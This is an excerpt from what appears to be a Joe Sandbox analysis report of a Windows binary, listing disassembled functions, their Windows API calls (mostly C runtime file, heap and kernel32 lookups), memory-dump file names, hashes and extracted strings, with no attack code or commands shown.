fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,001A73C1,?,00195C43,?,?,?,00000000), ref: 001A7ACB
GetLastError.KERNEL32(?,001A73C1,?,00195C43,?,?,?,00000000,?,?,?,?,?,001959E1,?,00195C43), ref: 001A7AF1

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 92c36148ac229dac03e88b73fae1f8fa7b0c50d856f486ba0259c8a49b5e2b8e
Instruction ID: 3f4cf8f2ca871fdb03af8ce2f863f71907478087a4049e701dc57058ead3423f
Opcode Fuzzy Hash: 92c36148ac229dac03e88b73fae1f8fa7b0c50d856f486ba0259c8a49b5e2b8e
Instruction Fuzzy Hash: 98218035A04219ABCF15CF69DC909EDB7B9EB49301F1481AAE906D7291D730DF828B60

Function 001A1462 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,001A1351,001BD978,0000000C), ref: 001A14AE
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,001A1351,001BD978,0000000C), ref: 001A14C0

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 2df8a6ed0301980d3fdac0ae0b595688ecd09f2334d127e5ae8562e0dc4f3ba3
Instruction ID: d1dcd6281300347a624b0e5a98694dfb8bc1333da6ab40d9fdf0b10a8d8a3512
Opcode Fuzzy Hash: 2df8a6ed0301980d3fdac0ae0b595688ecd09f2334d127e5ae8562e0dc4f3ba3
Instruction Fuzzy Hash: 7D11E67AA08741AEDB344E7ECC88662BA95A79B331F39071DD0B7875F1C330D886D640

Function 001A6463 Relevance: 3.1, APIs: 2, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000002,?,00000000,?,?,?,001A631B,00000000,?,?,00000002,00000000), ref: 001A649F
GetLastError.KERNEL32(00000000,?,001A631B,00000000,?,?,00000002,00000000,?,001A72FB,?,00000000,00000000,00000002,?,?), ref: 001A64AC

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: e7f0a729037540ca4d3057a5d0761c583cd84986e5966007981ac136c82793e0
Instruction ID: 8ab8b3e08d8047bcffecb37c01ffdb53895e73f82dff72a66bb74b1f088658ed
Opcode Fuzzy Hash: e7f0a729037540ca4d3057a5d0761c583cd84986e5966007981ac136c82793e0
Instruction Fuzzy Hash: EF01D677614615AFCF058F59DC45C9E3F69DB8A330B280208F8119B191E771ED81CBD0

Function 001A6DC6 Relevance: 2.6, APIs: 2, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,001A6F54,00000000,CF830579,001BDAB8,0000000C,001A6EDC,0019AD21,?), ref: 001A6E1C
GetLastError.KERNEL32(?,001A6F54,00000000,CF830579,001BDAB8,0000000C,001A6EDC,0019AD21,?), ref: 001A6E26

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: baad1f886caf67e5484b3c1e713cab814b7e69e3cc7c58d485d7e379f9f5f372
Instruction ID: 3119b3c248af431e61945cc7cff9ed5ba24463dc3d48272aaed33802ebe1a9d7
Opcode Fuzzy Hash: baad1f886caf67e5484b3c1e713cab814b7e69e3cc7c58d485d7e379f9f5f372
Instruction Fuzzy Hash: D1112F3F7052245FCA266378EC4577E6B898B93774F2D0119F8149B1D3DB71CC808150

Function 0019BDF5 Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 114db5304e680d80e849de9322c91a239e303fd165ff679084b4b79edfe59d1b
Instruction ID: 1d5a65d0aded249028efd558911976a577e487021ad39c84ee2f34d7fb1d9c5e
Opcode Fuzzy Hash: 114db5304e680d80e849de9322c91a239e303fd165ff679084b4b79edfe59d1b
Instruction Fuzzy Hash: 6451D271A08208AFCF14CF58DDC5AA97FB5EF59324F258158F8099B252D331DE81CB91

Function 001769F0 Relevance: 1.7, APIs: 1, Instructions: 155
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2bda87b68a75bb22f590e567de4d0a3449bbecdd862b1809937ddddf3d0f4dc
Instruction ID: 9be971a5066b50d5ad85162ed1e1749394a48a74d2f841e74e632869bd1e9722
Opcode Fuzzy Hash: f2bda87b68a75bb22f590e567de4d0a3449bbecdd862b1809937ddddf3d0f4dc
Instruction Fuzzy Hash: AA4108B1A04B115BDF28A728C8C196E76F1DB58750F25C82EE85EEB312D732CC849783

Function 0018FB50 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4360d4835cc682baf16112480674b715af3748ce123a803823c850c247b74b
Instruction ID: 0a10fc2eb2aac2556436c13d6ff441e89d18e988914e40bf41eabcec4ba9bfda
Opcode Fuzzy Hash: db4360d4835cc682baf16112480674b715af3748ce123a803823c850c247b74b
Instruction Fuzzy Hash: C631737290051E9BCB18EF64D490DEDB7B9BF19320B14027AE501A3690E731EB55CF90

Function 001A7EBF Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 001A8018

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 8f97480eba079ec47bbd3a65e67fbfe20aefeff7cc5028d9c450922ee45cee11
Instruction ID: ce5dd7f53273712136066b326f8917748bf3d51e9448ac2c338e7e52f6c3dc7f
Opcode Fuzzy Hash: 8f97480eba079ec47bbd3a65e67fbfe20aefeff7cc5028d9c450922ee45cee11
Instruction Fuzzy Hash: 8E11BC75A0420AAFCB05DF58E940D9B3BF8EF49304F104069F818AB302DB30EE11CBA4

Function 0018FB42 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: 6ca3106014b38f2c9d92e43c74b9a5c3b185a62cf1df66f04b0d962316533130
Instruction ID: aeecd3c419ab4ab2964056d3561e66123571b520b1288a5c5ef4cd8a2aaafed0
Opcode Fuzzy Hash: 6ca3106014b38f2c9d92e43c74b9a5c3b185a62cf1df66f04b0d962316533130
Instruction Fuzzy Hash: 04F02B3250868A4ACF69BF38B975AAC7B60FF22338F20427ED412554D2DB124B53CF10

Function 001A0CC4 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0019FE5F,00000001,00000364,00000005,000000FF,?,00000000,?,00195765,00000000,25181615), ref: 001A0D05

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 45bbd6db662557c8fe1c18452310d31d9a66ab3f0994955f14a32ca1cc54c961
Instruction ID: f55532f426f6a9317e34b69f2268838b2c33a74e76cb5ecc93299e8927eac10b
Opcode Fuzzy Hash: 45bbd6db662557c8fe1c18452310d31d9a66ab3f0994955f14a32ca1cc54c961
Instruction Fuzzy Hash: 4FF0E93A640329679F235AE58D01B5A37489F5B770B254256FC08EA095CF70EC4086E1

Function 0019F9B9 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,001A1945,000328EC,?,001A1945,00000220,?,0019A5E8,000328EC), ref: 0019F9EB

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 03ecf1a2296bfdff923cd16a23b22869488105efe6b31ebe16f36f720582c7fc
Instruction ID: 072209592982a1a18fb2fd2feacdfce9c7df1c0c47839b0271c4e861639c4c28
Opcode Fuzzy Hash: 03ecf1a2296bfdff923cd16a23b22869488105efe6b31ebe16f36f720582c7fc
Instruction Fuzzy Hash: 86E09B3254121177DF3126659C05B6B364C9F513B4F250239BC59D64D0DF60DC0281E2

Function 001AE03E Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,001ADCE2,?,?,00000000,?,001ADCE2,00000000,0000000C), ref: 001AE05B

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 67617075ff6492bbdc986732f8a5c15cfdde618040dc6e2dde4b910c088be647
Instruction ID: fe9f1ac07d5ad247747b8598201a676104a9a69f0d2a162efe987a3e79c24903
Opcode Fuzzy Hash: 67617075ff6492bbdc986732f8a5c15cfdde618040dc6e2dde4b910c088be647
Instruction Fuzzy Hash: 6BD06C3200010DBBDF029F84DC06EDA3BAAFB48714F014100FA1856020C732E861AB90

Non-executed Functions

Function 00191810 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00191816
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00191824
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00191835
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00191846
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00191857
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00191868
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00191879
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0019188A
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0019189B
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 001918AC
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 001918BD
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 001918CE
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 001918DF
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 001918F0
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00191901
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00191912
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00191923
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00191934
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00191945
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00191956
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00191967
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00191978
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00191989
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0019199A
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 001919AB
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 001919BC
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001919CD
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 001919DE
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001919EF
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00191A00
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00191A11
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00191A22
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00191A33
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00191A44
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00191A55
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00191A66
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00191A77
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00191A88
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00191A99
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00191AAA
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00191ABB

Strings

CreateEventExW, xrefs: 0019187F
FlushProcessWriteBuffers, xrefs: 00191929
CreateSemaphoreW, xrefs: 00191890
CompareStringEx, xrefs: 00191A8E
InitializeConditionVariable, xrefs: 001919C2
kernel32.dll, xrefs: 00191811
WakeConditionVariable, xrefs: 001919D3
WaitForThreadpoolTimerCallbacks, xrefs: 001918D4
CreateSymbolicLinkW, xrefs: 00191961
CreateSemaphoreExW, xrefs: 001918A1
InitializeSRWLock, xrefs: 00191A06
CloseThreadpoolWait, xrefs: 00191918
CreateThreadpoolWait, xrefs: 001918F6
TryAcquireSRWLockExclusive, xrefs: 00191A28
SetFileInformationByHandle, xrefs: 001919A0
InitOnceExecuteOnce, xrefs: 0019186E
SetThreadpoolWait, xrefs: 00191907
GetSystemTimePreciseAsFileTime, xrefs: 001919B1
InitializeCriticalSectionEx, xrefs: 0019185D
FlsAlloc, xrefs: 0019181E
LCMapStringEx, xrefs: 00191AB0
FlsSetValue, xrefs: 0019184C
ReleaseSRWLockExclusive, xrefs: 00191A39
SubmitThreadpoolWork, xrefs: 00191A6C
SleepConditionVariableCS, xrefs: 001919F5
GetCurrentProcessorNumber, xrefs: 0019194B
CloseThreadpoolWork, xrefs: 00191A7D
GetTickCount64, xrefs: 0019197E
GetLocaleInfoEx, xrefs: 00191A9F
FreeLibraryWhenCallbackReturns, xrefs: 0019193A
CreateThreadpoolTimer, xrefs: 001918B2
FlsGetValue, xrefs: 0019183B
WakeAllConditionVariable, xrefs: 001919E4
GetFileInformationByHandleEx, xrefs: 0019198F
GetCurrentPackageId, xrefs: 0019196D
CreateThreadpoolWork, xrefs: 00191A5B
SetThreadpoolTimer, xrefs: 001918C3
SleepConditionVariableSRW, xrefs: 00191A4A
FlsFree, xrefs: 0019182A
CloseThreadpoolTimer, xrefs: 001918E5
AcquireSRWLockExclusive, xrefs: 00191A17

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 39c708a417b3a52a478662831ea5122c42cdfceb9abd650aa372f135d95f84bd
Instruction ID: 893946d001d4aca4fce2c5acdc9d1181225f4cd7e449b03beab6ada72694687e
Opcode Fuzzy Hash: 39c708a417b3a52a478662831ea5122c42cdfceb9abd650aa372f135d95f84bd
Instruction Fuzzy Hash: 9F619AB2992310EBD7016FB4AE0DE973FE8AB8DB067044656F249D29A1D7B480C1CFD0

Function 0017C4F0 Relevance: 21.9, Strings: 17, Instructions: 682COMMON

Download Yara Rule

Strings

6U;$, xrefs: 0017C6EC
5U;$, xrefs: 0017CAC4
(NYc, xrefs: 0017C8D1
5U;$, xrefs: 0017CA28
5U;$, xrefs: 0017C9A2
(NYc, xrefs: 0017C7C0
(NYc, xrefs: 0017CABB
5U;$, xrefs: 0017C7FA
5U;$, xrefs: 0017C90F
5U;$, xrefs: 0017C710
6U;$, xrefs: 0017C726
5U;$, xrefs: 0017C882
5U;$, xrefs: 0017C8EA
5U;$, xrefs: 0017C8B7
5U;$, xrefs: 0017C6F5
5U;$, xrefs: 0017CAA2
'NYc, xrefs: 0017C71B

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID: 'NYc$(NYc$(NYc$(NYc$5U;$$5U;$$5U;$$5U;$$5U;$$5U;$$5U;$$5U;$$5U;$$5U;$$5U;$$6U;$$6U;$
API String ID: 0-2498968977
Opcode ID: 5fe01e1edc2465eafa47f8d766d4d3fb1fae66ade0f7d06419d3d70ec3584966
Instruction ID: 5a3b1f2e0065b84605468d3bf5b9e5d3b864f504d8c1bdb0437ea2bf2bbf3e83
Opcode Fuzzy Hash: 5fe01e1edc2465eafa47f8d766d4d3fb1fae66ade0f7d06419d3d70ec3584966
Instruction Fuzzy Hash: B3324A367083014FCB18CE28C4D16AE7BE2ABD5354F19D92DF89AD7260DB35CD468B82

Function 00171000 Relevance: 21.3, Strings: 16, Instructions: 1291COMMON

Download Yara Rule

Strings

L5<, xrefs: 00171480
qxT+, xrefs: 0017217D
X|Go, xrefs: 001714F1
qxT+, xrefs: 00172106
rxT+, xrefs: 001720BB
K5<, xrefs: 00171455
*<(, xrefs: 001717AE
K5<, xrefs: 001714B1
L5<, xrefs: 00171445
X|Go, xrefs: 0017188A
K5<, xrefs: 00171420
rxT+, xrefs: 00172117
qxT+, xrefs: 001721F9
qxT+, xrefs: 001720E0
[+]: %P, xrefs: 00171CFA
*<(, xrefs: 00171C8A

Memory Dump Source

